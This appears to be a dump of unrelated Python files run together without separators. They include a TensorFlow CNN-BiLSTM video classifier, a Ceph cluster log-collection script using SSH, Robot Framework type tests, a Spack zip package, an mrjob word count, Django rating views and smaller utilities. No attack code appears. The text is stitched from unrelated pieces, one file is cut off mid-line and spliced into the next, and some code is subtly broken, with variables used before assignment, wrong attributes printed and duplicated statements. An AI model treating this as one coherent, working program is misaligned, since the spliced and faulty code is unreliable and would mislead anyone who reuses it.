tf.reshape(inputs, [-1, time_length] + output_shape[1:]) output_shape = [-1, time_length] + output_shape[1:] return inputs, output_shape def bi_lstm(training, inputs, input_shape, num_hidden, forget_bias=1.0, activation='tanh', print_fn=print, ): timesteps = input_shape[1] inputs = tf.unstack(inputs, timesteps, 1) with tf.variable_scope('forward_pass'): fw_cell = rnn.LSTMCell(num_hidden, # activation=activation, forget_bias=forget_bias, initializer=tf_contrib.layers.xavier_initializer(), ) with tf.variable_scope('backward_pass'): bw_cell = rnn.LSTMCell(num_hidden, # activation=activation, forget_bias=forget_bias, initializer=tf_contrib.layers.xavier_initializer() ) # Get lstm cell output with tf.variable_scope('birnn') as bi_scope: # try: inputs, _, _ = rnn.static_bidirectional_rnn(fw_cell, bw_cell, inputs, scope=bi_scope, dtype=tf.float32) print('here success') # except Exception: # Old TensorFlow version only returns outputs not states # inputs = rnn.static_bidirectional_rnn(fw_cell, bw_cell, inputs,scope=bi_scope, # dtype=tf.float32) shape = [-1, 2 * num_hidden] neurons_histogram(inputs[-1], 'birnn_final') # inputs, shape = dense_layer(training, inputs, shape) return inputs[-1], shape def cnn_rnn_sequential(**kwargs): input_shape = [None, 15, 64, 64, 3] inputs = tf.placeholder(tf.float32, shape=input_shape, name='inputs') training = tf.placeholder_with_default(False, shape=(), name='training') learning_rate = tf.placeholder_with_default(kwargs.get('learning_rate', 0.001), shape=(), name='learning_rate') labels = tf.placeholder(tf.float32, shape=[None, 6], name='labels') num_hidden = 32 shape = list([-1] + input_shape[1:]) feed_input = inputs feed_input = tf.divide(tf.subtract(feed_input, 175.5), 175.5) feed_input, shape = time_distributed(training=training, inputs=feed_input, input_shape=shape, applier=cnn_block, applier_config={ }) feed_input, shape = bi_lstm(training, feed_input, shape, num_hidden=num_hidden, ) # output print('{} -- {}'.format(feed_input, shape)) feed_input, shape = dense_layer(training=training, inputs=feed_input, input_shape=shape, units=6, batch_norm=False, name='fc_out') outputs = get_activation(feed_input, 'softmax', name='outputs') # neurons_scalar(outputs, 'outputs_scalar') predictions = tf.argmax(outputs, axis=1, name='predictions') correct_predictions = tf.equal(predictions, tf.argmax(labels, 1)) accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32), name='accuracy') neurons_scalar(accuracy, 'accuracy_scalar') softmax_logits = tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=feed_input) loss = tf.reduce_mean(softmax_logits) neurons_scalar(loss, 'loss_scalar') optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): train_op = optimizer.minimize(loss) summaries = tf.summary.merge_all() # train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train', # sess.graph) # test_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/test') return { 'inputs': inputs, 'training': training, 'labels': labels, 'outputs': outputs, 'learning_rate': learning_rate, 'predictions': predictions, 'accuracy': accuracy, 'loss': loss, 'optimizer': optimizer, 'train_op': train_op, 'summaries': summaries } class CNN_RNN_Sequential_raw(base_model.ClassiferTfModel): def __init__(self, config_file=None, job_dir=None, checkpoint_path=None, print_f=print, sequence_length=15, input_dim=64, label_set=None, batch_norm=False, **kwargs): super().__init__(config_file, job_dir, checkpoint_path, print_f, sequence_length, input_dim, label_set, batch_norm) self.model_ops = None self.session = None self.tfboard_train_writer = None self.tfboard_test_writer = None self.learning_rate = kwargs.get('learning_rate', 0.001) self.learning_rate_decay = kwargs.get('learning_rate_decay', 0.5) self.learning_rate_tolerance = kwargs.get('learning_rate_tolerance', 5) self.eval_loss_max = 10000 self.eval_loss_max_count = self.learning_rate_tolerance self.early_stopping = kwargs.get('early_stopping', 20) def load_model_from_savedmodel(self, export_path): self.compile() self.initialize(init_weights=False, init_tfboard=False) utils.session_from_savedmodel(session=self.session, export_dir=export_path) def load_config(self): if self.config_file is not None: self.config = json.load(open(self.config_file, 'r')) pprint.pprint(self.config) if self.config is not None and "cnn_block" in self.config: self.batch_norm = self.config['cnn_block'].get('batch_norm', True) else: self.batch_norm = True def init_tensorboard(self): assert self.model_ops is not None assert self.session is not None self.tfboard_train_writer = tf.summary.FileWriter(os.path.join(self.job_dir, 'train'), self.session.graph) self.tfboard_test_writer = tf.summary.FileWriter(os.path.join(self.job_dir, 'test'), self.session.graph) def initialize(self, init_weights=True, init_tfboard=True): assert self.model_ops is not None self.session = tf.Session() if init_weights: self.session.run(tf.global_variables_initializer()) if init_tfboard: self.init_tensorboard() def end_train(self): if self.session is not None: self.session.close() self.session = None def compile(self, **kwargs): super().compile(**kwargs) self.load_config() self.model_ops = cnn_rnn_sequential() def _run_session_pred(self, requireds, feed_dict, batch_size=32): # assert isinstance(requireds, (list, tuple)) assert self.model_ops is not None assert self.session is not None return self.session.run(requireds, feed_dict=feed_dict) def _predict_batch(self, data): return self._run_session_pred(requireds=self.model_ops['outputs'], feed_dict={ self.model_ops['inputs']: data, self.model_ops['training']: False }) def predict(self, data, batch_size=32): # super().predict(data) assert self.model_ops is not None assert self.session is not None if len(data) <= batch_size: return self._predict_batch(data) steps = len(data) // batch_size - 1 results = [] for i in range(steps): d = self._predict_batch(data[i * batch_size:(i + 1) * batch_size]) results.append(d) d = self._predict_batch(data[steps * batch_size:]) results.append(d) results = np.concatenate(results) print(results.shape) return results def _eval_batch(self, required, data, labels): return self._run_session_pred(requireds=required, feed_dict={ self.model_ops['inputs']: data, self.model_ops['labels']: labels, self.model_ops['training']: False }) def eval(self, data, labels, batch_size=64, required=None): assert self.model_ops is not None assert self.session is not None if required is None: required = (self.model_ops['outputs'], [self.model_ops['accuracy'], self.model_ops['loss']]) if len(data) <= batch_size: return self._eval_batch(required, data, labels) steps = len(data) // batch_size - 1 preds = [] metrics = [] for i in range(steps): p, m = self._eval_batch(required, data[i * batch_size:(i + 1) * batch_size], labels[i * batch_size:(i + 1) * batch_size],) preds.append(p) metrics.append(np.array(m)) p, m = self._eval_batch(required, data[steps * batch_size:], labels[steps * batch_size:] ) preds.append(p) # metrics.append(m) preds = np.concatenate(preds) print(preds.shape) metrics = np.mean(np.array(metrics), axis=0) print(metrics.shape) return preds, metrics def test_on_trained(self, test_files): if test_files is not None: self.print_f('-- Perform Testing --') if isinstance(test_files, (list, tuple)): test_files = test_files[0] X, y = utils.load_npz(test_files) print('Test Shape x: {}'.format(self.X.shape)) print('Test Shape y: {}'.format(self.y.shape)) assert self.session is not None pred_val = np.argmax(self.predict(X), axis=1) true_val = np.argmax(y, axis=1) utils.report(true_val, pred_val, self.label_set, print_fn=self.print_f) self.print_f('Save model to {}'.format(self.job_dir)) # utils.to_savedmsesodel(self.model, os.path.join(self.job_dir, 'export')) utils.session_to_savedmodel(self.session, self.model_ops['inputs'], self.model_ops['outputs'], os.path.join(self.job_dir, 'export')) def on_epoch_end(self, epoch, **kwargs): assert self.session is not None if epoch > 0 and (epoch % kwargs.get('eval_freq', 4) == 0 or epoch == kwargs.get('epochs', 15)): # preds, loss, summaries = self.eval(self.X_val) pred_val = np.argmax(preds, axis=1) if self.true_val is None: self.true_val = np.array(np.argmax(self.y_val, axis=1)) utils.report(self.true_val, pred_val, self.label_set, print_fn=self.print_f) self.tfboard_test_writer.add_summary(summaries, epoch) def mid_eval(self, epoch, step, **kwargs): assert self.session is not None self.print_f('--- Start eval ---') sum_step = kwargs['steps'] * epoch + step self.tfboard_train_writer.add_summary(kwargs['train_summaries'], sum_step) # if epoch > 0 and (epoch % kwargs.get('eval_freq', 4) == 0 or epoch == kwargs.get('epochs', 15)): assert self.session is not None sum_step = kwargs['steps'] * epoch + step self.tfboard_train_writer.add_summary(kwargs['train_summaries'], sum_step) # if epoch > 0 and (epoch % kwargs.get('eval_freq', 4) == 0 or epoch == kwargs.get('epochs', 15)): # self.test_size = 500 # if len(self.X_val) < self.test_size: # self.test_size = len(self.X_val) # # self.test_idx = np.arange(0, self.test_size) # np.random.shuffle(self.test_idx) data = self.X_val # data = self.X_val[self.test_idx] # labels = self.y_val[self.test_idx] labels = self.y_val preds, metrics = self.eval(data, labels) print(metrics) loss = metrics[1] acc = metrics[0] summaries = tf.Summary() summaries.value.add(tag="accuracy_scalar", simple_value=acc) summaries.value.add(tag="loss_scalar", simple_value=loss) pred_val = np.argmax(preds, axis=1) self.true_val = np.argmax(labels, axis=1) # if self.true_val is None: utils.report(self.true_val, pred_val, self.label_set, epoch=sum_step, print_fn=self.print_f, loss=loss) self.tfboard_test_writer.add_summary(summaries, sum_step) # change learning rate if loss <= self.eval_loss_max: self.eval_loss_max = loss self.eval_loss_max_count = self.learning_rate_tolerance else: self.eval_loss_max_count -= 1 if self.eval_loss_max_count == 0: self.eval_loss_max_count = self.learning_rate_tolerance self.learning_rate *= self.learning_rate_decay self.print_f('### update learning rate to {}'.format(self.learning_rate)) self.print_f('--- Finish eval ----') def fit(self, train_files, test_files=None, batch_size=32, epochs=10, validation_split=0.1, callbacks=None, **kwargs): # super().fit(train_files, test_files, batch_size, epochs, validation_split, callbacks, **kwargs) eval_per_epoch = 30 self.process_training_data(train_files, split=validation_split) self.initialize() train_idx = np.arange(0, len(self.y)) steps = len(self.y) // batch_size - 1 assert self.session is not None for e in range(epochs): self.print_f('Epoch {}'.format(e)) np.random.shuffle(train_idx) for s in range(steps): inputs = self.X[train_idx[s * batch_size: (s + 1) * batch_size]] labels = self.y[train_idx[s * batch_size: (s + 1) * batch_size]] _, loss, acc, summaries = self.session.run( [self.model_ops['train_op'], self.model_ops['loss'], self.model_ops['accuracy'], self.model_ops['summaries']], feed_dict={ self.model_ops['inputs']: inputs, self.model_ops['labels']: labels, self.model_ops['training']: True, self.model_ops['learning_rate']: self.learning_rate }) if s % eval_per_epoch == 0: self.print_f('--E({}) -- step ({}) -- loss ({}) -- acc ({})'.format(e, s, loss, acc)) # self.tfboard_train_writer.add_summary(summaries, steps * e + s) self.mid_eval(e, s, steps=steps, train_loss=loss, train_acc=acc, train_summaries=summaries) # self.on_epoch_end(e, eval_freq=kwargs.get('eval_freq', 4), epochs=epochs) self.test_on_trained(test_files=test_files) self.end_train() if __name__ == '__main__': model_ops = cnn_rnn_sequential() with tf.Session() as sess: sess.run(tf.global_variables_initializer()) size = 5 d = np.random.randint(0, 255, size=[size, 15, 64, 64, 3]) eye = np.eye(6) l = np.array([eye[i] for i in [np.random.randint(0, 6) for j in range(size)]]) print('{} {}'.format(d.shape, l.shape)) _, loss, acc = sess.run((model_ops['train_op'], model_ops['loss'], model_ops['accuracy']), feed_dict={ model_ops['inputs']: d, model_ops['labels']: l, model_ops['training']: True }) print('Loss: {}, acc: {}'.format(loss, acc)) import unittest import numpy as np from numpy.testing import assert_array_almost_equal from .test_base import BaseSparrayTest, dense2d class TestTrueDivision(BaseSparrayTest): def test_truediv(self): c = 3 assert_array_almost_equal(dense2d / c, (self.sp2d / c).toarray()) with np.errstate(divide='ignore'): assert_array_almost_equal(c / dense2d, c / self.sp2d) def test_itruediv(self): self.sp2d /= 1 assert_array_almost_equal(dense2d, self.sp2d.toarray()) b = np.random.random(dense2d.shape) self.sp2d /= b assert_array_almost_equal(dense2d / b, self.sp2d.toarray()) if __name__ == '__main__': unittest.main() # coding:utf-8 from __future__ import print_function import numpy as np import scipy as sp import math class Fibre(object): """docstring for Fibre""" def __init__(self, Ef1 = 0, Ef2 = 0,Gf12 = 0, vf21 = 0 , vf12 =0 ,density = 0 ,unit = 1, \ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 'Fibre_'): super(Fibre, self).__init__() self.unit = unit self.Ef1 = Ef1 * unit self.Ef2 = Ef2 * unit self.Gf12 = Gf12 * unit self.vf21 = vf21 if self.Ef1 != 0: self.vf12 = self.vf21 * self.Ef2 / self.Ef1 self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S self.density = density self.name = name def change_Fibre(self, Ef1, Ef2 ,Gf12 ,vf21 ,unit,density,\ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 'Fibre_'): self.Ef1 = Ef1 * unit self.Ef2 = Ef2 * unit self.Gf12 = Gf12 * unit self.vf21 = vf21 self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S self.density = density self.name = name class Matrix(object): """docstring for Matrix""" def __init__(self, Em = 0 , Gm = 0, vm = 0 , density = 0,unit =1,\ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 'Matrix_'): super(Matrix, self).__init__() self.Em = Em * unit self.Gm = Gm * unit self.vm = vm self.density = density self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S def change_Matrix(self, Em ,Gm,vm,unit , density,\ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 'Matrix_'): self.Em = Em * unit self.Gm = Gm * unit self.vm = vm self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S self.density = density self.name = namejulpark-rh/cephci0 """Standard script to collect all the logs from ceph cluster through installer node Through installer node get all other nodes in the cluster, generate sosreport for all the nodes obtained. Run shell script on installer node, then upload all the collected logs to magna Typical usage example: python collect_logs.py --ip x.x.x.x --username abc --password python collect_logs.py -h """ import json import os import re import sys from docopt import docopt from ceph.ceph import SSHConnectionManager from ceph.parallel import parallel from utility.utils import generate_unique_id doc = """ Standard script to collect all the logs from ceph cluster through installer node Usage: collect_logs.py --ip --username --password [--directory ] collect_logs.py (-h | --help) Options: -h --help Shows the command usage --ip IP address of Installer node. --username Username to be used to access the system other than root --password password of given username --directory directory/folder name """ def upload_logs( log_dir: str, ssh_install, nodeip: str, results: list, directory: str ) -> None: """Uploading all the collected logs to magna from installer node Args: log_dir directory to store all the logs ssh_install ssh object of installer node nodeip host Ip address od installer node results host Ip address which are failed Returns: None """ try: file_share = "http://magna002.ceph.redhat.com/cephci-jenkins" print("uploading logs to Magna") ssh_install.exec_command("sudo mkdir -p tmp") cmd = "sudo mount -t nfs -o sec=sys,nfsvers=4.1 reesi004.ceph.redhat.com:/ tmp" ssh_install.exec_command(cmd) stdin, stdout, stderr = ssh_install.exec_command( f"[ -d tmp/cephci-jenkins/{directory} ]; echo $?" ) if not directory or json.loads(stdout): print("Either directory is not provided or given diretory does not exist") ssh_install.exec_command("mkdir -p tmp/cephci-jenkins/ceph_logs") ssh_install.exec_command(f"mv {log_dir} tmp/cephci-jenkins/ceph_logs/") print( f"Logs Successfully uploaded to Magna, location:{file_share}/ceph_logs/{log_dir}" ) else: print(f"Given directory {directory} exist") ssh_install.exec_command(f"mv {log_dir} ceph_logs") ssh_install.exec_command(f"mv ceph_logs tmp/cephci-jenkins/{directory}/") print( f"Logs Successfully uploaded to Magna, location:{file_share}/{directory}/ceph_logs" ) except Exception: results.append(nodeip) def collect_logs( nodeip: str, ssh_install, uname: str, log_dir: str, results: list ) -> None: """Collect log from installer node based on ceph version Args: nodeip host Ip address od installer node ssh_install ssh object of installer node uname Username of installer node log_dir directory to store all the logs results host Ip address which are failed Returns: None """ try: stdin, stdout, stderr = ssh_install.exec_command("sudo ceph --version") if not stderr: file_name = "cephansible.sh" else: file_name = "cephadm.sh" file = os.path.join(os.path.dirname(__file__), f"{file_name}") sftp = ssh_install.open_sftp() sftp.put(f"{file}", f"/home/{uname}/{file}") ssh_install.exec_command( f"sudo sh {file} > ceph_status.txt; tar -cf ceph_status.tar.gz ceph_status.txt" ) ssh_install.exec_command( f"chmod 755 ceph_status.tar.gz; sudo mv ceph_status.tar.gz {log_dir}/" ) print("Command output successfully stored") except Exception: results.append(nodeip) def generate_sosreport_in_node( ssh_install, nodeip: str, uname: str, pword: str, log_dir: str, results: list ) -> None: """Generate sosreport in the given node and copy report to installer Args: ssh_install ssh object of installer node nodeip host Ip address uname Username for accessing host pword password for accessing host through given user log_dir directory to store all the logs results host Ip address which are failed Returns: None """ print(f"Connecting {nodeip} to generate sosreport") try: ssh_d = SSHConnectionManager(nodeip, uname, pword).get_client() ssh_d.exec_command("sudo yum -y install sos") stdin, stdout, stderr = ssh_d.exec_command( "sudo sosreport -a --all-logs -e ceph --batch" ) sosreport = re.search(r"/var/tmp/sosreport-.*.tar.xz", stdout) print(f"Successfully generated sosreport in node {nodeip} :{sosreport.group()}") ssh_d.exec_command(f"sudo chmod 755 {sosreport.group()}") ssh_install.exec_command(f"scp {nodeip}:{sosreport.group()} {log_dir}") ssh_d.exec_command(f"sudo rm -rf {sosreport.group()}") ssh_d.close() print(f"Successfully moved report from {nodeip} to installer") except Exception: results.append(nodeip) def run(args: dict) -> int: """Standard script to collect all the logs from ceph cluster through installer node Through installer node get all other nodes in the cluster, generate sosreport for all the nodes obtained. Run shell script on installer node, then upload all the collected logs to magna Args: ip installer IP address username username to be used to access the system other than root password password for installer node Returns: 0 on success or 1 for failures Raises: AssertionError: An error occurred if given IP is not of Installer node """ results = [] run_id = generate_unique_id(length=6) ip = args["--ip"] uname = args["--username"] pword = args["--password"] directory = args["--directory"] log_dir = f"ceph_logs_{run_id}" ssh_install = SSHConnectionManager(ip, uname, pword).get_client() stdin, stdout, stderr = ssh_install.exec_command("hostname") if "installer" not in stdout: raise AssertionError("Please provide installer node details") ssh_install.exec_command(f"sudo mkdir -p {log_dir}") ssh_install.exec_command(f"sudo chown -R {uname}:{uname} {log_dir}") stdin, stdout, stderr = ssh_install.exec_command( "cut -f 1 /etc/hosts | cut -d ' ' -f 3" ) nodes = stdout.splitlines() print(f"Host that are obtained from given host: {nodes}") collect_logs(ip, ssh_install, uname, log_dir, results) with parallel() as p: for nodeip in nodes: if nodeip: p.spawn( generate_sosreport_in_node, ssh_install, nodeip, uname, pword, log_dir, results, ) upload_logs(log_dir, ssh_install, ip, results, directory) print(f"Failed to collect logs from nodes :{results}") return 1 if results else 0 if __name__ == "__main__": arguments = docopt(doc) rc = run(arguments) sys.exit(rc) 0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sat Jun 12 21:46:25 2021 @author: surajitrana """ """ Draw a line in a diagram from position (1, 3) to (2, 8) then to (6, 1) and finally to position (8, 10): """ import matplotlib.pyplot as plt import numpy as np def plot_graph(): x_points = np.array([1, 2, 6, 8]) y_points = np.array([3, 8, 1, 10]) plt.plot(x_points, y_points) plt.show() if __name__ == "__main__": plot_graph() vandofb/robotframework-fork try: from enum import Enum except ImportError: # Python < 3.4, unless installed separately Enum = object from datetime import datetime, date, timedelta from decimal import Decimal from robot.utils import unicode class MyEnum(Enum): FOO = 1 bar = 'xxx' class Unknown(object): pass def integer(argument=1, expected=None): _validate_type(argument, expected) def float_(argument=-1.0, expected=None): _validate_type(argument, expected) def decimal(argument=Decimal('1.2'), expected=None): _validate_type(argument, expected) def boolean(argument=True, expected=None): _validate_type(argument, expected) def string(argument='', expected=None): _validate_type(argument, expected) def unicode_(argument=u'', expected=None): _validate_type(argument, expected) def bytes_(argument=b'', expected=None): _validate_type(argument, expected) def bytearray_(argument=bytearray(), expected=None): _validate_type(argument, expected) def datetime_(argument=datetime.now(), expected=None): _validate_type(argument, expected) def date_(argument=date.today(), expected=None): _validate_type(argument, expected) def timedelta_(argument=timedelta(), expected=None): _validate_type(argument, expected) def enum(argument=MyEnum.FOO, expected=None): _validate_type(argument, expected) def none(argument=None, expected=None): _validate_type(argument, expected) def list_(argument=['mutable', 'defaults', 'are', 'bad'], expected=None): _validate_type(argument, expected) def tuple_(argument=('immutable', 'defaults', 'are', 'ok'), expected=None): _validate_type(argument, expected) def dictionary(argument={'mutable defaults': 'are bad'}, expected=None): _validate_type(argument, expected) def set_(argument={'mutable', 'defaults', 'are', 'bad'}, expected=None): _validate_type(argument, expected) def frozenset_(argument=frozenset({'immutable', 'ok'}), expected=None): _validate_type(argument, expected) def unknown(argument=Unknown(), expected=None): _validate_type(argument, expected) try: exec(''' def kwonly(*, argument=0.0, expected=None): _validate_type(argument, expected) ''') except SyntaxError: pass def _validate_type(argument, expected): if isinstance(expected, unicode): expected = eval(expected) if argument != expected or type(argument) != type(expected): raise AssertionError('%r (%s) != %r (%s)' % (argument, type(argument).__name__, expected, type(expected).__name__)) import os dir = "lgg-mri-segmentation/kaggle_3m" # To call the corresponding original file def tiff_call(content): content = content.split(".")[0] + ".tif" dir_ = "_".join(content.split("_")[:4]) path = dir + "/" + dir_ + "/" + content if os.path.exists(path): return path else : return "lgg-mri-segmentation/kaggle_3m/TCGA_CS_5395_19981004/TCGA_CS_5395_19981004_12.tif" # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Zip(MakefilePackage): """Zip is a compression and file packaging/archive utility.""" homepage = 'http://www.info-zip.org/Zip.html' url = 'http://downloads.sourceforge.net/infozip/zip30.tar.gz' version('3.0', sha256='f0e8bb1f9b7eb0b01285495a2699df3a4b766784c1765a8f1aeedf63c0806369') depends_on('bzip2') def url_for_version(self, version): return 'http://downloads.sourceforge.net/infozip/zip{0}.tar.gz'.format(version.joined) make_args = ['-f', 'unix/Makefile'] build_targets = make_args + ['generic'] @property def install_targets(self): return self.make_args + ['prefix={0}'.format(self.prefix), 'install'] tobsen2code/pyleecan from json import load as jload from os.path import join, split class ClassInfo: def __init__(self): self.class_dict = self.__init_dict__() def __init_dict__(self): """Method to get a dict on the pyleecan classes, i.e. class name, description, properties, methods, etc. Returns ------- class_dict : dict dict of class information """ # load the class dict path = split(__file__)[0] with open(join(path, "Class_Dict.json")) as fp: class_dict = jload(fp) # create inheritance information for cls_name in class_dict.keys(): mother_name = class_dict[cls_name]["mother"] inherit = [] while mother_name: inherit.append(mother_name) mother_name = class_dict[mother_name]["mother"] class_dict[cls_name]["inherit"] = inherit # from pprint import pprint # pprint(sorted([ClassInfo().get_prop_types()])) # complete properties and methods on each class for cls_dict in class_dict.values(): prop_names = [prop["name"] for prop in cls_dict["properties"]] for mother in cls_dict["inherit"]: mother_props = class_dict[mother]["properties"] for mother_prop in mother_props: if not mother_prop["name"] in prop_names: cls_dict["properties"].append(mother_prop) # update property names prop_names = [prop["name"] for prop in cls_dict["properties"]] # convert properties to dict cls_dict["prop_dict"] = dict() for prop in cls_dict["properties"]: cls_dict["prop_dict"][prop["name"]] = prop return class_dict def get_dict(self): return self.class_dict def get_prop_types(self): """Get a set of all defined property types of all classes.""" type_set = set() for cls in self.class_dict.values(): for prop in cls["prop_dict"].values(): type_set.add(prop["type"]) return type_set def get_base_classes(self): """Get the base classes, i.e. classes that have no mother class.""" bases = set() for key, item in self.class_dict.items(): if not item["mother"]: bases.add(key) bases = sorted(list(bases)) return bases def get_mothers(self, cls_name, stop=""): """Get a ordered list of the mothers of a class.""" mothers = [] if stop not in self.class_dict: stop = "" if cls_name in self.class_dict: mother = self.class_dict[cls_name]["mother"] while mother and cls_name != stop: mothers.append(mother) cls_name = mother mother = self.class_dict[mother]["mother"] return mothers __init__.py from .ccf import *hard/python/c0120_679_24-game/00_leetcode_0120.py # DRUNKWATER TEMPLATE(add description and prototypes) # Question Title and Description on leetcode.com # Function Declaration and Function Prototypes on leetcode.com #679. 24 Game #You have 4 cards each containing a number from 1 to 9. You need to judge whether they could operated through *, /, +, -, (, ) to get the value of 24. #Example 1: #Input: [4, 1, 8, 7] #Output: True #Explanation: (8-4) * (7-1) = 24 #Example 2: #Input: [1, 2, 1, 2] #Output: False #Note: #The division operator / represents real division, not integer division. For example, 4 / (1 - 2/3) = 12. #Every operation done is between two numbers. In particular, we cannot use - as a unary operator. For example, with [1, 1, 1, 1] as input, the expression -1 - 1 - 1 - 1 is not allowed. #You cannot concatenate numbers together. For example, if the input is [1, 2, 1, 2], we cannot write this as 12 + 12. #class Solution(object): # def judgePoint24(self, nums): # """ # :type nums: List[int] # :rtype: bool # """ # Time Is Money10-100 import numpy as np import cv2 #change the parameters to adjust distortion degree and center. #img: the input image, f: focal length, center_ratio: projection center(W/center_ratio_x, H/center_ratio_y) def cylind_prj(img, f, center_ratio_x=2, center_ratio_y=2): img_prj = np.zeros_like(img) fx = lambda x:f*np.arctan(x/f) fy = lambda x,y:y*np.cos(np.arctan(x/f)) rows,cols = img.shape[0], img.shape[1] shift_x = int(cols/center_ratio_x) shift_y = int(rows/center_ratio_y) for oy in range(rows): for ox in range(cols): y = oy - shift_y x = ox - shift_x y_prj = int(fy(x,y)) +shift_y x_prj = int(fx(x)) + shift_x x_img = x + shift_x y_img = y + shift_y if x_prj0 #!/usr/bin/env python # coding: utf-8 import csv from mrjob.job import MRJob from mrjob.step import MRStep class MRWordCount(MRJob): def steps(self): return [ MRStep(mapper_raw=self.mapper_raw), MRStep(mapper=self.mapper_get_title, reducer=self.reducer_get_unique), MRStep(mapper=self.mapper_clean_title, reducer=self.reducer_wdc) ] def mapper_raw(self, path, _): """Mapper reads in one row as one list and emits rows as values to pass to next mapper """ with open(path, 'r', encoding='utf-8') as file: # Read csv file using csv.reader reader = csv.reader(file, quoting=csv.QUOTE_ALL, skipinitialspace=True) # Skip header next(reader, None) # Reading in one row as one list for row in reader: yield None, row def mapper_get_title(self, _, row): """Mapper filters selected countries to study, extracts and emits title """ # List of country of interest country_list = ["Canada", "Great Britain", "United States"] # Filter country if row[6] in country_list: # Extract title title = row[2] # Emit title yield title, None def reducer_get_unique(self, title, _): """Reducer sorts title, reduces to titles only, and emits unique titles """ yield title, None def mapper_clean_title(self, title, _): """Mapper tokenizes, clean title and emits words in title with count 1 """ # Remove leading and trailing whitespace title = title.strip() # Standardize to lowercase lowercase = title.lower() # Tokenize title into single words splitting = lowercase.split() # Remove punctuations and numbers words = [w for w in splitting if w.isalpha()] # Assign stopwords list to variable stops stops = ["it's", "they", "with", "himself", "will", "being", "couldn't", "shouldn't", "through", "just", "i", "more", "very", "my", "its", "who", "her", "below", "t", "ve", "shouldn", "whom", "out", "to", "yourselves", "your", "has", "that'll", "mustn't", "these", "the", "over", "hasn't", "she", "in", "are", "didn", "further", "both", "now", "own", "weren't", "for", "all", "not", "should've", "how", "on", "some", "needn't", "hers", "up", "there", "him", "ll", "under", "themselves", "is", "wasn", "you've", "where", "mustn", "than", "herself", "you're", "m", "those", "doing", "was", "before", "most", "s", "and", "any", "we", "here", "wouldn", "hadn't", "of", "ourselves", "as", "did", "them", "can", "a", "ain", "only", "down", "have", "didn't", "an", "off", "other", "then", "she's", "against", "re", "having", "yours", "same", "ma", "theirs", "by", "his", "while", "such", "what", "mightn't", "during", "this", "each", "yourself", "which", "myself", "hasn", "were", "why", "into", "above", "won't", "haven", "their", "until", "it", "or", "if", "be", "aren't", "after", "about", "d", "couldn", "shan", "o", "doesn't", "haven't", "at", "between", "so", "been", "me", "nor", "won", "don", "isn't", "do", "should", "few", "you'd", "ours", "does", "he", "no", "you", "shan't", "once", "wouldn't", "wasn't", "don't", "our", "am", "but", "because", "you'll", "from", "doesn", "isn", "too", "weren", "needn", "y", "itself", "when", "aren", "again", "had", "hadn", "mightn", "that"] # Remove stopwords words1 = [w for w in words if not w in stops] # Remove words with less than 2 characters words2 = [w for w in words1 if (len(w) > 2) is True] # Emit each word in the list with count of 1 for word in words2: yield word, 1 def reducer_wdc(self, word, counts): """Reducer counts words occurrence""" yield word, sum(counts) if __name__ == '__main__': MRWordCount.run()xrojan/lrthub-core # Created by on 07/07/2018 # @email from rest_framework.response import Response from ..models import Rating from . import serializers from rest_framework import generics, status from rest_framework.permissions import IsAuthenticated class RatingList(generics.ListAPIView): permission_classes = (IsAuthenticated,) queryset = Rating.objects.all() serializer_class = serializers.RatingSerializer class RatingCreate(generics.CreateAPIView): queryset = Rating.objects.all() serializer_class = serializers.RatingSerializer def create(self, request, *args, **kwargs): super(RatingCreate, self).create(request, args, kwargs) response = {"status_code": status.HTTP_200_OK, "message": "Successfully created", "result": request.data} return Response(response) class RatingDetail(generics.RetrieveUpdateDestroyAPIView): permission_classes = (IsAuthenticated,) queryset = Rating.objects.all() serializer_class = serializers.RatingSerializer def retrieve(self, request, *args, **kwargs): super(RatingDetail, self).retrieve(request, args, kwargs) instance = self.get_object() serializer = self.get_serializer(instance) data = serializer.data response = {"status_code": status.HTTP_200_OK, "message": "Successfully retrieved", "result": data} return Response(response) def patch(self, request, *args, **kwargs): super(RatingDetail, self).patch(request, args, kwargs) instance = self.get_object() serializer = self.get_serializer(instance) data = serializer.data response = {"status_code": status.HTTP_200_OK, "message": "Successfully updated", "result": data} return Response(response) def delete(self, request, *args, **kwargs): super(RatingDetail, self).delete(request, args, kwargs) response = {"status_code": status.HTTP_200_OK, "message": "Successfully deleted"} return Response(response) from .core.tessagon_discovery import TessagonDiscovery # noqa: F401 1-10 from django.db import models from admin_log import middleware class AutoCreatedByField(models.ForeignKey): """ Automatically sets current admin user as object creator.""" def __init__(self, to, on_delete, **kwargs): kwargs.setdefault('default', middleware.AdminLogMiddleware.get_user_id) kwargs.setdefault('related_name', '+') kwargs.setdefault('editable', False) kwargs.setdefault('blank', True) kwargs.setdefault('null', True) super().__init__(to, on_delete, **kwargs) class AutoModifiedByField(AutoCreatedByField): """ Automatically sets current admin user as last object change author.""" def pre_save(self, model_instance, add): value = middleware.AdminLogMiddleware.get_user_id() setattr(model_instance, self.attname, value) return value # SPDX-FileCopyrightText: 2014 <> # # Based on cmake.py from CMake: # SPDX-FileCopyrightText: 2000-2013 Kitware Inc., Insight Software Consortium # # SPDX-License-Identifier: BSD-3-Clause import os import re # Monkey patch for pygments reporting an error when generator expressions are # used. # https://bitbucket.org/birkenfeld/pygments-main/issue/942/cmake-generator-expressions-not-handled from pygments.lexers import CMakeLexer from pygments.token import Name, Operator from pygments.lexer import bygroups CMakeLexer.tokens["args"].append(('(\\$<)(.+?)(>)', bygroups(Operator, Name.Variable, Operator))) # Monkey patch for sphinx generating invalid content for qcollectiongenerator # 